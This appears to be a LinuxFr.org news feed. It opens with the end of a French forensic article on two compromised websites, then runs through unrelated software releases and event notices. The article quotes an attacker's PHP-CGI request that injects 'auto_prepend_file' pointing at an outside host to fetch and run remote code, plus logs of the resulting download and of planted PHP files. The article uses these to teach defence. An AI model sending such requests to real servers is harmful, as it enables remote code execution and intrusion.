    81.163.131.61 [28/Mar/2015:06:03:09] "POST /index.php?q=ckeditor%2Fxss 200 81.163.131.61 [28/Mar/2015:06:03:10] "POST /index.php?q=ckeditor%2Fxss 200

    Puis une requête sur un fichier avec un nom étrange :

    81.163.131.61 [28/Mar/2015:06:07:06] "POST /sites/all/themes/wtm7973n.php HTTP/1.1" 200

    Et il vient d'être créé :

    ls -l ./sites/all/themes/wtm7973n.php -rw-rw---- 1 2003 2003 1285 mars 28 06:03 ./sites/all/themes/wtm7973n.php

    Si on continue encore un peu dans les logs, on voit cette ligne :

    81.163.131.61 [28/Mar/2015:06:07:08] "GET /wp-conf.php?t8449n=1 HTTP/1.1" 200

    Rien ne vous saute aux yeux ? Le fichier wp-conf.php est propre à wordpress, et n'a rien à faire sur un drupal. Il faudra prévoir de faire un peu de nettoyage par la suite.

    VU !

    Donc, on aurait une attaque sur "ckeditor", qui aurait permis de créer d'autres fichiers. Après une petite recherche, ckeditor est un module pour Drupal avec des failles connues, dont la nôtre.

    Un correctif existe, il suffirait donc de restaurer une sauvegarde du site datant d'AVANT l'attaque puis de mettre le module à jour, ce qui permet d'éviter de devoir nettoyer les fichiers un par un, au risque d'en louper.

    Allons plus loin

    L'attaque semble venir d'une faille de ce module, mais autant en être sûr. N'hésitez surtout pas à rechercher dans les logs toutes les IP ayant fait une requête sur les fichiers pirates (wp-conf.php, wtm7973n.php…), puis sur toutes les requêtes que ces adresses IP ont faites.

    Je ne vais pas vous mettre les logs de ces recherches ici, ça prendrait trop de place, mais je note que :

    • 6 adresses IP différentes ont fait des requêtes sur le fichier wp-conf.php :
    zcat *.gz|grep wp-conf.php|awk {'print $1'}|sort|uniq -c 1 188.162.64.65 - 492 requêtes, seulement des 404 2 205.234.200.234 2 31.184.195.247 2 81.163.131.58 9 81.163.131.61 8 81.17.16.116
    • L'IP 81.17.16.111 a fait une requête sur un fichier update.php du module ctools, faudrait peut-être voir pour le mettre à jour par la même occasion si ce n'est pas le cas ;-)
    81.17.16.111 - - [28/Mar/2015:18:22:05 +0100] "POST /sites/all/modules/ctools/page_manager/plugins/update.php HTTP/1.1" 200 13203 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130331 Firefox/21.0" 0 Exemple 2 : vulnérabilité sur PHP 5.2

    Nous avons reçu 2 alertes dans la nuit concernant une attaque sur le site www.exemple.org. L'attaquant a profité de l'utilisation de php5.2 pour lancer le téléchargement d'un fichier sur un serveur distant via la commande wget (sans fichiers modifiés) mais en lancant un processus "ennemi" :

    2001 3912 0.0 0.0 29700 4136 ? S 01:50 0:00 /usr/sbin/httpd

    En fouillant dans les logs au moment de l'attaque, on tombe sur cette ligne :

    189.18.60.245 - - [20/Apr/2015:01:50:27 0200] "GET /?-d%20allow_url_include%3DOn-d%20auto_prepend_file%3Dhttp://www.krol.lt/run.txt HTTP/1.1" 200 7 "-" "Mozilla/3.0 (compatible; Indy Library)" 300

    Et en fait, la réponse se trouve dans error.log :

    [01:50:27] [error] [client 189.18.60.245] --2015-04-20 01:50:27-- http://www.krol.lt/w.txt [01:50:27] [error] [client 189.18.60.245] Resolving www.krol.lt (www.krol.lt)... [01:50:27] [error] [client 189.18.60.245] 5.199.171.10 [01:50:27] [error] [client 189.18.60.245] Connecting to www.krol.lt (www.krol.lt)|5.199.171.10|:80... [01:50:27] [error] [client 189.18.60.245] connected. [01:50:27] [error] [client 189.18.60.245] HTTP request sent, awaiting response... [01:50:27] [error] [client 189.18.60.245] 200 OK [01:50:27] [error] [client 189.18.60.245] Length: 29582 [01:50:27] [error] [client 189.18.60.245] (29K) [text/plain] [01:50:27] [error] [client 189.18.60.245] Saving to: `w.txt' [01:50:27] [error] [client 189.18.60.245] [01:50:27] [error] [client 189.18.60.245] 0K . [01:50:27] [error] [client 189.18.60.245] ........ [01:50:27] [error] [client 189.18.60.245] . ..... [01:50:27] [error] [client 189.18.60.245] ... [01:50:27] [error] [client 189.18.60.245] .. ...... [01:50:27] [error] [client 189.18.60.245] .. 100% [01:50:27] [error] [client 189.18.60.245] 171K=0.2s [01:50:27] [error] [client 189.18.60.245] [01:50:27] [error] [client 189.18.60.245] 2015-04-20 01:50:27 (171 KB/s) - `w.txt' saved [29582/29582] [01:50:27] [error] [client 189.18.60.245]

    La meilleure solution serait de mettre à jour le site pour utiliser une version de php plus récente que la version dont il a besoin actuellement (php 5.2) qui possède des vulnérabilités. Hélas, la meilleure solution n'étant pas toujours possible, il va falloir patcher directement. Si on connait la cause du problème, on trouve normalement des solutions rapidement sur le net, dans notre cas : PHP-CGI Vulnerability Exploited in the Wild qui explique le fonctionnement et la parade de cette attaque via un .htaccess.

    Vous pouvez également éditer directement le(s) vhost(s)p our y ajouter les trois lignes suivantes :

    RewriteEngine on RewriteCond %{QUERY_STRING} (%2d|-)d.*auto_prepend [NC] RewriteRule .? - [F,L] En conclusion

    Avant une attaque :

    • mettre en place des sauvegardes (sites, base de données…) réguliers et automatiques
    • mettre en place un système pour être alerter en cas de problème (supervision sur les processus, chaînes de caractères présentes dans les fichiers…)

    Après une attaque :

    • définir le moment de la création ou de la modification des fichiers
    • rechercher dans les logs l'origine de l'attaque
    • définir les différents attaquants (IP / origine de l'attaque)
    • définir si d'autres fichiers ont été créé/modifié

    Et bien entendu, se tenir à jour ET mettre à jour régulièrement ses CMS :

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Sortie de Miam-Player 0.7.2

    3 mai, 2015 - 23:35

    Depuis la sortie de Miam-Player 0.7.1 à la fin du mois de mars, une quarantaine de commits ont été réalisé. Grâce à Qt, une nouvelle plateforme est supportée sans trop de soucis : OS X Yosemite. Un installeur "Approuvé par l'utilisateur lambda" est également présent.

    Merci à la communauté de Firefox pour leur image disque.

    Liste des modifications
    • Ajout du format Opus
    • Amélioration de la recherche dans la lecture des fichiers OGG Vorbis
    • Ajout d'un indicateur visuel dans la barre de l'explorateur de fichiers, lorsque le chemin est trop long
    • Ajout d'un menu contextuel pour arrêter la lecture après la piste en cours
    • Mise en surbrillance de la liste de lecture lorsque l'on souhaite glisser-déposer des pistes
    • Nouveau curseur représentant le nombre de pistes en cours de déplacement lors d'un glisser-déposer d'une liste à l'autre ou au sein d'une même liste de lecture.
    • Mise à jour automatique et incrémentale de la bibliothèque à chaque démarrage
    • Recherche des pistes favorites via le caractère * : ainsi *** retourne toutes les pistes ayant 3 étoiles ou plus
    • Affichage des étoiles sur la gauche pour les pistes qui en possèdent (paramétrable dans les options)
    • Finalisation du mode de recherche non-exclusif. Les résultats d'une recherche peuvent maintenant s'afficher en gras. Les lettres d'accès rapide à côté de la barre de défilement verticale sont également surlignées. Par exemple, si l'on recherche "live", tous les artistes ayant ce terme (albums, piste, etc) sont retournés. Ainsi "Best of Live" d'Iggy Pop surlignera également la lettre "I"
    • Finalisation de l'affichage de la pochette lorsque l'on déplie un album. Elle est semi-transparente à 66% par défaut mais encore une fois l'utilisateur peut régler simplement de 0 à 100. Si la pochette est trop petite pour la place disponible, le bord gauche est étiré, flouté et rendu linéairement transparent

    Problèmes connus

    Depuis longtemps, le tout premier scan du disque dur fait figer l'interface. En fonction de la quantité de médias à analyser, cela peut durer de quelques secondes à plusieurs minutes.

    Les autres problèmes recensés concernent majoritairement l'éditeur de tags. Consultez le dépôt GitHub pour le listing détaillé.

    Prochaines évolutions Égaliseur

    Grâce à la version 2.2.0 de VLC et de la mise à jour du SDK, l'intégration de l’égaliseur dans Miam-Player sera infiniment plus simple à mettre en œuvre.

    Ci-dessous, voici ce que je compte réaliser comme IHM pour l'égaliseur :

    Éditeur de tags

    La gestion des méta-données requiert encore des ajustements, comme la possibilité d'interagir avec les pochettes dans l'éditeur de tags. Des pistes pour tagger automatiquement à partir du nom de fichiers sont en cours d'étude. Il existe également des services web pour récupérer par lots ces informations et il serait de bon aloi de regarder comment implémenter un tel service.

    Téléchargement

    Sources
    Paquet debian pour Ubuntu 15.04 réalisé par mes soins

    Télécharger ce contenu au format Epub

    Lire les commentaires

    PrimTux distribution éducative basée sur Debian Jessie

    3 mai, 2015 - 13:00

    PrimTux est une distribution GNU/Linux éducative personnalisable basée sur Debian Jessie, disposant de quatre environnements adaptés aux cycles de l'école élémentaire, développée en coopération avec ASRI éducation. La consommation mémoire au démarrage est inférieure à 100 Mo grâce au gestionnaire de fenêtres Fluxbox associé au gestionnaire du bureau Rox. Elle dispose d'un système de catégorisation et d'édition simplifié des raccourcis. Le menu utilisé est celui de PCManFM agrémenté des marque-pages pour distinguer les différentes catégories. L'installation est simple, utilise systemback, ce qui permet de créer facilement ensuite sa propre distribution.

    En session live, les utilisateurs peuvent se connecter avec un mot de passe : mini (cycle 1, mot de passe : tuxmini), super (cycle 2, mot de passe : tuxsuper), maxi (cycle 3, mot de passe : tuxmaxi), quidam (maître, mot de passe : tuxmaitre). Dans le cas d'une installation sur disque dur, ces environnements sont à installer.

    Quatre environnements adaptés personnalisables Accueil

    Mini mot de passe tuxmini

    Super mot de passe tuxsuper

    Maxi mot de passe tuxmaxi

    Maître (Yoda) ou Quidam mot de passe tuxmaitre

    Logiciels éducatifs installés

    • Lecture : Aller, Associations, exercices Beaunis, exercices.free, imageo, le jeu du pendu, le mot le plus long ;
    • Calcul : à nous les nombres, calcul mental, calcul réfléchi, calculatrice, calculette capricieuse, contour, exercices.free, fukubi, la course aux nombres, le matou matheux, le nombre cible, opérations, problèmes, suites, suites arithmétiques, tierce, Tuxmaths ;
    • Clavier-souris : Jnavigue, Mulot, Pysycache ;
    • Compilations : Childsplay, GCompris, Omnitux, pepit, pysiogame, Jclic ;
    • Dessin : Tuxpaint ;
    • Découverte du monde : Atlas Houot ;
    • Géométrie : chemin, epi: labyrinthe, labyrinthe caché, comparaison, piles, symcolor, géotortue, Tangrams ;
    • Sciences : Stellarium, microscope virtuel, Scratch ;
    • Jeux : blobby volley, frozen-bubble, Hannah's horse, monsterz, Mr Patate, ri-li, Seahorse adventures, Supertux ;
    • Pour le maître : Ardora, open sankoré, Pylote, l'administration de Tuxpaint, de GCompris, de Pysycache, Jclic author ;
    • Bureautique : OOO4Kids, Dicorime ;
    • Graphisme : Mirage, Pinta, Shutter ;
    • Internet : FileZilla, Seamonkey ;
    • Son et vidéo : Audacity, Winff, Soundconverter, VLC, gmplayer, xfburn.

    Compatibilité matérielle
    • PrimTux fonctionne sur des PC équipés de processeurs non-PAE et PAE, est compatible avec les PC équipés de BIOS UEFI;
    • Poids: 3,6 Go / 7,2 Go installée ;
    • Consommation RAM: 80 Mo au chargement( version installée) / 90 Mo au chargement (version live);
    • 256 Mo de ram (et swap de 1,5 fois la RAM, habituel sous linux) sont conseillés pour la faire tourner correctement.
    Deux ou trois versions
    • PrimTux ;
    • PrimTux-Wine : cette version contient Wine et le logiciel de Pragmatice « Clicmenu », lanceur des applications Windows compatibles avec la distribution. Le cycle 1 se voit ainsi agrémenté de 20 applications, le cycle 2 de 64 applications, et le cycle 3 de 112 applications, toutes gratuites et pour lesquelles les auteurs ont donné l'autorisation de diffusion à des fins non-commerciales ;
    • PrimTux-dys est à l'étude pour remplacer ASRI Edu 300 orientation dys, une plateforme est conçue sur une base de puppy lucid 528 et requiert seulement 512 Mo RAM pour un confort optimum. Elle peut donc fonctionner sur de très vieux ordinateurs portables. L'ISO de la plateforme peut être gravée sur DVD ou démarrée à partir d'une clé USB amorçable. Elle est dérivée de l'ASRI 300 (plateforme éducative) dégraissée en jeux et intègre des logiciels adaptés aux enfants dyslexiques, dyspraxiques et dyscalculiques.
    Télécharger ce contenu au format Epub

    Lire les commentaires

    Les journaux LinuxFr.org les mieux notés du mois d'avril 2015

    3 mai, 2015 - 12:59

    LinuxFr.org propose des dépêches et articles, soumis par tout un chacun, puis revus et corrigés par l'équipe de modération avant publication. C'est la partie la plus visible de LinuxFr.org, ce sont les dépêches qui sont le plus lues et suivies, sur le site, via Atom/RSS, ou bien via partage par messagerie instantanée, par courriel, ou encore via médias sociaux.

    Ce que l’on sait moins, c’est que LinuxFr.org vous propose également à tous de tenir vos propres articles directement publiables, sans validation a priori des modérateurs. Ceux-ci s'appellent des journaux. Voici un florilège d'une dizaine de ces journaux parmi les mieux notés par les utilisateurs… qui notent. Lumière sur ceux du mois d'avril passé.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Containers et virtualisation jeudi 7 mai 2015 à Arlon

    2 mai, 2015 - 14:26

    Après une première rencontre pour faire connaissance, les jeudis du libre à Arlon (Belgique) débutent leur première conférence organisée à l'avance (ou presque, jeudi 7 mai 2015) avec pour thème:

    • Virtualbox pour une utilisation « à la maison »;
    • KVM et Proxmox VE pour « la cave » ou « le grenier »;
    • et enfin, Docker, pour vos tests et développements, dans « le train/le bus/… »

    Le nombre de places étant limité, l'inscription est recommandée. L'entrée est gratuite.

    La conférence se déoulera dans les bureaux d'Inforjeunes, 31 place Didier, Arlon, Belgique.

    Les jeudis du libre à Arlon sont organisé par l'ASBL 6x7 qui s'occupe également des cafés numériques (conférence sur des thèmes technologiques mais pas forcément liés au libre) et les repairs cafés (rencontre pour réparer tout ce qu'on veut, de l'ordinateur au bouton de chemise).

    Télécharger ce contenu au format Epub

    Lire les commentaires

    OpenBSD 5.7 « Blues Brothers »

    1 mai, 2015 - 09:06

    Le premier mai, OpenBSD est de sortie, comme chaque année.

    OpenBSD est un système d'exploitation orienté sécurité et réseau, dont les principaux avantages sont la stabilité, grâce aux audits sur le code source, mais également l'ensemble très large de fonctionnalités réseau qu’il fournit.

    Le changement majeur de cette version est dans la continuité du fork d’OpenSSL, LibreSSL (cf. Bob Beck, LibreSSL - The first 30 days and the Future, BSDcan 2014 ; Ted Unangst, LibreSSL: More Than 30 Days Later, EuroBSDCon 2014). En effet, neuf jours après la sortie d'OpenBSD 5.6, la vulnérabilité POODLE a pointé son nez. Adieu SSL 3, SSH 1 et MD5 !

    Ont contribué à cette dépêche (par ordre de dispersion) : BAud, karchnu, Loïc Blot, Xavier Teyssier, palm123, zurvan, Cédric Krier, Rolinh, Xavier Claude, Ellendhel, Dareg, Nÿco, Stéphane Aulery. Aucune moule n'a été blessée durant la rédaction.

    Sommaire Mises à jour Logiciels

    Dans les grandes lignes, OpenBSD, accompagné de ses ports, c'est :

    • xserver 1.16.4 ;
    • GCC 4.8.4 et 4.9.2 ;
    • Gnome 3.14.2 ;
    • Go 1.4.1 ;
    • Libreoffice 4.3.5 ;
    • LLVM/CLANG 3.5 ;
    • Firefox 35.0.1 et 31.4.0-ESR ;
    • Mono 3.12.0 ;
    • Perl 5.20 ;
    • PHP 5.3.29, 5.4.38, 5.5.22 et 5.6.5 ;
    • Xfce 4.10 ;
    • et bien d'autres… (plus de 9 000 ports)
    Réseau
    • la couche des mbufs bénéficie désormais du multi-processing de manière sécurisée ;
    • les interfaces carp nécessitent obligatoirement l’option carpdev ;
    • il est possible de changer la taille de la file d’attente des paquets IPv6.
    Sécurité
    • l’espace d’adressage du noyau a été renforcé au moyen des mécanismes W^X (aucun emplacement mémoire n’est à la fois accessible en exécution et en écriture) ;
    • il n’est plus possible de charger des modules noyau ;
    • procfs a été supprimé ;
    • /var/tmp est maintenant un lien symbolique vers /tmp ; ce n’est qu'un premier pas vers la réduction de la surface d’attaque de la partition /var ;
    • SHA512 remplace MD5 pour les séquences initiales de TCP ainsi que dans le générateur de nombres aléatoires ;
    • le passwd ne gère plus que le chiffrement Blowfish ;
    • SSLv2/3 ont été complètement retirés d’OpenBSD au profit de TLS (y compris pour OpenSMTPD), ils sont aussi désactivés par défaut dans LibreSSL ;
    • LibreSSL gère des algorithmes AEAD et le PFS par défaut ;
    • toutes les architectures bénéficient enfin (débuté en 2003 par les libraires) de PIE, le système d’allocation en position aléatoire des programmes en mémoire (cf. Pascal Stumpf, Converting OpenBSD to PIE, AsiaBSDCon 2015 : transparents, papier).
    Pilotes

    Parmi une trentaine de nouveaux pilotes on remarque notamment :

    Serveur web

    Nginx a été retiré de base. Si vous souhaitez l’utiliser il faut passer par les packages. Il a été remplacé par httpd inclus dans base lors de la sortie de la version précédente. Le module FastCGI a été notablement amélioré rendant httpd compatible avec davantage d’applications web courantes (cf. Reyk Flöter, OpenBSD's new httpd, AsiaBSDCon 2015 : transparents, papier).

    Entré en septembre 2011 et sorti en mai 2015, après moins de quatre ans, Nginx n’aura pas fait long feu, alors qu’Apache avait rendu service pendant seize ans.

    Pour rappel, httpd n’offre pas toutes les fonctionnalités de Nginx mais seulement celles utiles au projet — ce qui devrait suffire au commun des mortels évidemment. Pour 10 000 lignes de code, la chose est honnête :

    • fichiers statiques : sert les fichiers et répertoires statiques via l'option auto-indexing ;
    • fastCGI : FastCGI direct (pas de cache) et asynchrone via des sockets UNIX ou locaux ;
    • sécurité : sécurité avant tout, chrooté avec privsep par défaut ;
    • SSL/TLS : connexions sécurisées en TLS 1.2 via LibreSSL ;
    • serveurs virtuels : serveurs virtuels par nom ou IP ;
    • reconfiguration : rafraîchissement de la configuration sans interruption ;
    • journalisation : journalisation pour chaque serveur via des fichiers de log ou syslog ;
    • accès : blocage, ralentissement et redirection de connexions.

    L’ajout de Server Name Indication (SNI) et des certificats client est envisagé.

    Installation
    • il est possible de booter sur les architectures PowerMac7,2 et PowerMac7,3 avec un noyau multiprocesseur ;
    • les interfaces réseau virtuelles trunk (agrégation de liens physiques) sont disponibles durant les mises à jour ;
    • les fonctionnalités cryptographiques ont été retirées du ramdisk — également compilé sans optimisation — afin de récupérer de l’espace pour d’autres fonctionnalités ;
    • les ensembles etcXX.tgz et xetcXX.tgz ont été fusionnés avec baseXX.tgz et xbaseXX.tgz.
    Divers

    Mandoc prend en charge les codages UTF-8 et ISO-8859-1. Les programmes man et apropos sont maintenant des façades de mandoc (cf. Ingo Schwarze, New trends in mandoc, BSDcan 2014).

    L’implémentation des opérations atomiques a été complétée pour toutes les architectures avec les nouvelles primitives :

    • atomic_cas_uint ;
    • atomic_swap_uint ;
    • atomic_add_int ;
    • atomic_sub_int ;
    • atomic_inc_int ;
    • atomic_dec_int et membar_sync.

    Les développeurs travaillent activement à supprimer le verrou global du noyau. Sans cela, il est impossible d’exploiter correctement une machine multi-processeur. Pour le moment, seuls 20 appels système sur 208 sont sans verrou. Par contre, le sous-système audio est déjà sans verrou, ainsi que le pilote réseau myx.

    L’usage des fonctions d’allocation de mémoire (propres à OpenBSD : reallocarray() et mallocarray()) a été généralisé pour prévenir les débordements d’entier, en lieu et place de la politique précédente concernant calloc(). Elles offrent un compromis entre la flexibilité de realloc() et la lenteur de calloc() — cette dernière initialise systématiquement la totalité de la mémoire allouée, sans considération d'utilité.

    Ci-gisent hp300, mvme68k et mvme88k

    La prise en charge de plusieurs architectures a été retirée d'OpenBSD 5.5 : hp300, mvme68k, mvme88k. Le fait n’avait pas été signalé. Les disques durs des machines du responsable de ces ports ont rendu leur dernier soupir. Il a décidé de ne pas réanimer ces infortunés Lazare.

    Noone sane will mourn these ports anyway. So long, and thanks for the fish. — Miod Vallat

    Aucune personne qui soit saine (d’esprit ?) ne pleurera ces ports de toute façon. Salut, et encore merci pour le poisson — Miod Vallat

    NdM : de toute façon Miod Vallat maintient un grand nombre de ports sur toutes sortes de machines.

    Passage de GCC à llvm / clang ?

    FreeBSD intègre clang dans base depuis la version 9 (janvier 2012), permettant la compilation quasi complète (World et le noyau GENERIC) pour certaines architectures (i386, AMD64, ARM, PowerPC, PowerPC64). Clang n’est pas encore le compilateur par défaut, excepté pour l'architecture x86 depuis novembre 2012.

    NetBSD, quant à lui, propose clang comme alternative depuis mars 2014 pour les architectures i386, AMD64 et ARM.

    Et OpenBSD dans tout ça ? La question revient régulièrement sur les listes de discussion avec le même constat. Clang manque encore de prise en charge pour les architectures autres que X86, ARM et PowerPC, ce qui freine son adoption en l’état. Toutefois ce n’est pas le seul obstacle.

    En juillet 2013, Miod Vallat, le mainteneur des patchs d’OpenBSD pour GCC, a fait part de l’état d’esprit des développeurs sur la question.

    Une poignée d’entre eux se familiarise avec les entrailles de llvm / clang espérant dans quelques mois / années pouvoir compiler les architectures principales. La route sera longue.

    Toutefois, une question de fond a été soulevée. OpenBSD recherche d’abord et avant tout un compilateur proposant les standards de C / C++ au complet, un support de longue durée (LTS) et une optimisation du code qui n’introduise pas de bogues — pas trop agressive.

    Tout se résume à une question de confiance envers le compilateur qui devrait être quasi exempt de bogues et produire des programmes exactement conformes à leur code source. OpenBSD travaille d’arrache-pied pour que sa version de GCC s’approche le plus possible de cet idéal. Une bascule vers clang remettrait en cause tous ces efforts.

    Il faut bien constater qu’à ce jour, aucun compilateur libre ne répond à tous ces critères pourtant légitimes. Alors quid d’un support LTS de GCC et llvm / clang, comme pour le noyau Linux ou Firefox ?

    Changement de boutique officielle

    Depuis octobre 2014, OpenBSD Europe Store, tenue par Zednax, est devenue la boutique privilégiée d’OpenBSD.

    La Computer Shop of Calgary d’Austin Hook est toujours en activité, mais devrait fermer à moyen terme — on peut le penser — car il « a acheté une ferme avec des vaches et des chèvres » (sic, pour sa retraite ?). Austin continuera au second plan, en fidèle gardien des traditions, prodiguant ses conseils et son aide.

    Après quelques adaptations nécessaires au démarrage pour le paiement en tout point du globe, Theo de Raadt est très content des services rendus par OpenBSD Europe Store qu’il a qualifié de « transparente, responsable, propre ». En bref, de très bonnes relations se sont établies et ce n’est pas sans raison. Longue vie à OpenBSD Europe Store !

    Conclusion

    Fidèle à elle-même, la communauté OpenBSD continue son chemin avec des moyens modestes mais capables d'innover et de relever les enjeux actuels comme le fork d’OpenSSL.

    La liquidation du verrou global du noyau en est un exemple. Il sera intéressant de comparer combien de temps il faudra aux développeurs d’OpenBSD là où ceux du noyau Linux ont mis 31 mois.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Qjelt Toulouse, le 5 mai 2015

    1 mai, 2015 - 09:05

    Le groupe d'utilisateurs et utilisatrices de Logiciels Libres de Toulouse Toulibre en collaboration avec Tetaneutral.net fournisseur d'accès internet et hébergeur libre proposent aux sympathisants et sympathisantes de se retrouver l'un des mardis ou jeudis de chaque mois pour échanger autour des logiciels Libres, des réseaux libres, discuter de nos projets respectifs et lancer des initiatives locales autour du Libre. Ce repas est ouvert à toutes et à tous, amatrices et amateurs de l'esprit du Libre, débutantes et débutants ou technicien(ne)s chevronné(e)s.

    Ce Qjelt aura lieu le mardi 5 mai 2015 à 20h30, au restaurant "la Paniolade" situé au 146 Boulevard de Suisse à Toulouse. C'est à proximité des ponts jumeaux et accessible par bus même tard le soir (ligne 16 en marchant un peu). Il n'y a pas de formule prévue, c'est à la carte : pizzas, viandes, poissons, salades…

    Pour des raisons de logistique, une inscription préalable avant la veille au soir est demandée.

    Inscription demandée avant le mercredi soir à l'adresse http://www.toulibre.org/qjelt.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Protocole de migration vers LibreOffice - disponible en français

    30 avril, 2015 - 21:10

    Le protocole de migration vers LibreOffice, édité par The Document Foundation, et traduit en Français par Liberasys, est disponible.

    Un des clients de la société a demandé de réaliser une étude préliminaire de migration à LibreOffice. En cherchant sur Internet, on peut trouver le document de The Document Foundation : LibreOffice migration protocol. Il détaille la stratégie et le processus qui permettent de migrer vers LibreOffice en maximisant les chances de succès. J'ai beaucoup aimé, je l'ai traduit et je le met à disposition (PDF Hybride en licence CC-BY-SA, à part la marque et le logo Liberasys).

    NdM : le document comporte 10 pages et présente d'abord LibreOffice, puis la migration (protocole, expérience des migrations précédentes, communication, personnes relais, formation et support, déploiement).

    Depuis 2014 j'utilise uniquement LibreOffice pour mes documents professionnels. En effet les dernières versions de LibreOffice sont stables, fonctionnelles et agréables à utiliser (les versions précédentes n'étaient pas prêtes pour une utilisation professionnelle selon moi, et oui, je suis exigeant :-). J'ai mis un peu de temps à m'adapter au logiciel, mais ça vaut vraiment le coup. De plus, les tests de conversions de documents depuis la suite MS Office on montré un excellent résultat (conversions de macros et de fonctions du tableur, mise en page conservée pour les documents textes et les présentations). Bref, si vous hésitiez, si vous avez testé il y a quelques années et avez été déçu(e), c'est le moment de s'y mettre ! Merci The Document Foundation et merci LibreOffice, vous faites avancer les choses dans le bon sens.

    <commercial>
    J'ai créé mon entreprise en début d'année à Lorient. Liberasys propose des systèmes d'informations (systèmes, réseaux, sécurité) basés au maximum sur des logiciels libres (ex : Linux Debian, ownCloud, Horde, Zabbix, Proxmox VE et MG, matériel MikroTik et Synology, …). De la réalisation à la maintenance, nous mettons en œuvre les outils informatiques qui collent aux besoins de chaque entreprise, tout en garantissant la liberté de nos clients.
    </commercial>

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Publication des éditeurs de documents en ligne de OnlyOffice

    30 avril, 2015 - 19:01

    OnlyOffice a annoncé, ce 20 avril 2015, la publication de la version bêta de ses éditeurs en ligne : OnlyOffice Document Server. Ces trois logiciels : traitement de texte, feuilles de calcul et présentation, viennent compléter les applications de gestion existantes : gestion de documents, de projets, de clients, de communauté, de courriels, de contacts, etc. déjà présentés sur LinuxFR.org.

    OnlyOffice Document Server est distribué sous les termes de la licence AGPL v.3.

    Qu'est-ce que OnlyOffice Document Server ?

    OnlyOffice Document Server ce sont des éditeurs de textes, de classeurs et de présentations qui se chargent dans votre navigateur web pour une édition collaborative en temps réel, avec commentaires et tchat.

    OnlyOffice Document Editor

    OnlyOffice Spreadsheet Editor

    OnlyOffice Presentation Editor

    Technologie

    L'interface utilisateur des éditeurs de documents de OnlyOffice est réalisée à base de Canvas (élément de HTML5). Cette technologie permet d'assurer l'identité du fichier d'entrée avec celui de sortie depuis tout navigateur sous tout système d'exploitation.

    Formats pris en charge

    Les formats pris en charge par les éditeurs de OnlyOffice sont les suivants :

    • lecture / édition : .doc, .docx, .odt, .rtf, .txt, .xls, .xlsx, .csv, .ods, .ppt, .pptx, .odp ;
    • téléchargement : .doc, .docx, .odt, .rtf, .txt, .pdf, .html, .xlsx, .csv, .ods, pptx.
    Intégration avec d'autres produits OnlyOffice

    OnlyOffice permet d'installer et d'utiliser les éditeurs de documents en ligne séparément ou en les connectant au système collaboratif (OnlyOffice Community Server) et au serveur de messagerie (OnlyOffice Mail Server).

    L'intégration avec la dernière version de OnlyOffice Community Server, sortie ce 20 avril 2015, permet de modifier les fichiers chargés du disque dur de l'ordinateur aussi bien que les fichiers stockés en ligne sur Box, Dropbox, GoogleDrive, SharePoint, OneDrive, OwnCloud etc., tous depuis un seul endroit.

    Installation des éditeurs en ligne

    Pour installer OnlyOffice Document Server, trois méthodes sont disponibles :

    1. installer à l'aide de Docker ;
    2. utiliser One-Click Installation.
    3. compiler le code source disponible sur GitHub ;
    1. Installation à l'aide de Docker

    Pour la déployer, vous avez besoin d'avoir Docker 1.4.1 ou supérieur installé sur votre ordinateur.

    Installer OnlyOffice Document Server séparément

    Démarrez Docker et exécutez la commande suivante :

    sudo docker run -i -t -d -p 80:80 onlyoffice/documentserver

    Cette commande télécharge le fichier docker à partir de Docker Hub (seulement la première fois) et lance le conteneur pour exécuter OnlyOffice Document Server et toutes les dépendances nécessaires pour son travail.

    Installer OnlyOffice Document Server avec OnlyOffice Community Server et Mail Server

    Etape 1 : Installer OnlyOffice Document Server.

    sudo docker run -i -t -d --name onlyoffice-document-server onlyoffice/documentserver

    Etape 2 : Installer OnlyOffice Mail Server.

    Pour un fonctionnement correct du serveur de messagerie il est nécessaire de déterminer son nom d'hôte 'yourdomain.com'.

    sudo docker run --privileged -i -t -d --name onlyoffice-mail-server -p 25:25 -p 143:143 -p 587:587 \-h yourdomain.com onlyoffice/mailserver

    Etape 3 : Installer OnlyOffice Community Server

    sudo docker run -i -t -d -p 80:80 -p 443:443 \--link onlyoffice-mail-server:mail_server \--link onlyoffice-document-server:document_server \onlyoffice/communityserver

    Par ailleurs, vous pouvez utiliser docker-compose pour installer tous les composants du bureau en ligne en exécutant une seule commande:

    wget https://raw.githubusercontent.com/ONLYOFFICE/Docker-CommunityServer/master/docker-compose.yml docker-compose up -d

    2. Utilisation de One-Click Installation

    Cette installation est destinée à ceux qui désirent installer toute la solution sur une machine vide automatiquement. Pour en profiter :

    Etape 1 : Passer à la page de déploiement.

    Etape 2 : Saisir les données suivantes : adresse IP, nom d'utilisateur, clé SSH ou mot de passe.

    Etape 3 : Cliquer sur le bouton "Install".

    Toute la solution sera installée automatiquement sur votre serveur Linux.

    Remarque : il est recommandé de changer le mot de passe une fois l'installation complétée.

    Une fois installé il suffit de saisir localhost (http://127.0.0.1) dans votre barre d'adresse pour ouvrir le bureau en ligne.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Sortie d’Ubuntu 15.04

    30 avril, 2015 - 12:02

    Sortie le 23 avril 2015, Ubuntu 15.04 est la vingt-deuxième version d’Ubuntu. Il s'agit d'une version classique, qui sera maintenue pendant 9 mois. Son nom de code est Vivid Vervet, soit le « vervet vif » en bon français.

    Pour rappel, Ubuntu est une distribution GNU/Linux basée sur Debian. Elle a hérité de sa distribution mère l'objectif d'universalité : elle vise à être utile sur les ordinateurs de bureau, les ordinateurs portables, mais aussi les serveurs, le cloud, les téléphones, les tablettes et même les objets connectés en général. Elle se veut simple d’accès pour les utilisateurs n’ayant pas de connaissances poussées en informatique, mais aussi pour les développeurs.

    En plus de la distribution mère, Ubuntu, il existe plusieurs variantes officielles, fournies avec des choix logiciels différents, afin de couvrir un besoin (Ubuntu Server, Edubuntu…) ou de fournir un environnement de bureau particulier (Kubuntu, Xubuntu…). Cette dépêche présente les nouveautés pour les principales d’entre elles.

    Sommaire

    Généralités - En vrac

    Comme d'habitude, la plupart des paquets ont été mis à jour.
    On notera principalement :

    • Noyau Linux 3.19 ;
    • Mesa 10.5 ;
    • La majeure partie des composants de GNOME passent en 3.14 ;
    • Qt 5.4 ;
    • LibreOffice 4.4.
    Gestionnaire de bureau Unity 7

